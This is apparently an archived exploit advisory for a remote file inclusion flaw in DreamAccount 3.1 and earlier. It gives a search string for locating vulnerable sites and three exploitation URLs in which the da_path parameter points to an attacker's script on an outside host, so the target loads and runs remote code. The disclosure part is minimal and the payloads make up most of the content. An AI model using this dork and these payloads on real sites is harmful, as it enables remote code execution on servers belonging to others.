id: 493
date: 06/04/2006
title: DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities
author: Aesthetico
cves: 

=================================================================
DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities
=================================================================



Title: DreamAccount <= 3.1 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dreamcost.com
URL: http://dreamcost.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "powered by DreamAccount"
-----------------------------------------------------------------

Exploitation:

/auth.cookie.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.header.inc.php?da_path=http://www.yourspace.com/yourscript.php?
/auth.sessions.inc.php?da_path=http://www.yourspace.com/yourscript.php?




#  0day.today [2023-03-26]  #